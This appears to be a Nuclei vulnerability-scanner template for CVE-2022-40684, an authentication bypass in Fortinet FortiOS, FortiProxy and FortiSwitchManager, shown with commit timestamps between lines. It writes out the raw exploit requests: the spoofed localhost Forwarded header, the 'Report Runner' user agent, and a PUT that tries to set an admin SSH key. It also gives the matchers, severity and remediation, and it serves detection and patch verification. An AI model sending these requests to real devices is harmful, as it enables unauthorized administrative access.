2022-10-14 09:09:38 +00:00
id : CVE-2022-40684
info :
2022-10-19 21:11:27 +00:00
name : Fortinet - Authentication Bypass
2022-10-14 09:09:38 +00:00
author : Shockwave,nagli,carlosvieira
severity : critical
description : |
2022-10-19 21:11:27 +00:00
Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability.
2022-10-14 09:09:38 +00:00
reference :
- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-40684
2022-10-14 09:09:38 +00:00
classification :
2022-10-21 08:16:09 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-10-25 14:05:39 +00:00
cvss-score : 9.8
cve-id : CVE-2022-40684
2023-08-31 11:46:18 +00:00
cwe-id : CWE-287
2024-01-14 13:49:27 +00:00
epss-score : 0.95976
epss-percentile : 0.99342
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : fortinet
product : fortiproxy
tags : cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive
2022-10-14 09:09:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-14 09:09:38 +00:00
- raw :
- |
GET /api/v2/cmdb/system/admin HTTP/1.1
Host : {{Hostname}}
User-Agent : Node.js
Forwarded : by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
X-Forwarded-Vdom : root
- |
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host : {{Hostname}}
User-Agent : Report Runner
Content-Type : application/json
Forwarded : for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length : 610
2022-10-19 21:11:27 +00:00
{
"ssh-public-key1" : "{{randstr}}"
2022-10-14 09:09:38 +00:00
}
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2022-10-14 09:09:38 +00:00
matchers-condition : or
matchers :
- type : word
part : body_1
words :
2023-07-11 19:49:27 +00:00
- ENC XXXX
- http_method
2022-10-14 09:09:38 +00:00
condition : and
- type : word
part : body_2
words :
2023-07-11 19:49:27 +00:00
- Invalid SSH public key.
- cli_error
2022-10-14 09:09:38 +00:00
condition : and
2024-01-14 14:05:19 +00:00
# digest: 4b0a004830460221008a7ecfe93fd3b0f83f381a3df5cf9b1091507b4b531b505e5cc92c38c7854f34022100b13bced64d6795535e9b7950ed79789d3e34a463804a1bff5da5835f0f765ce4:922c64590222798bb761d5b6d8e72950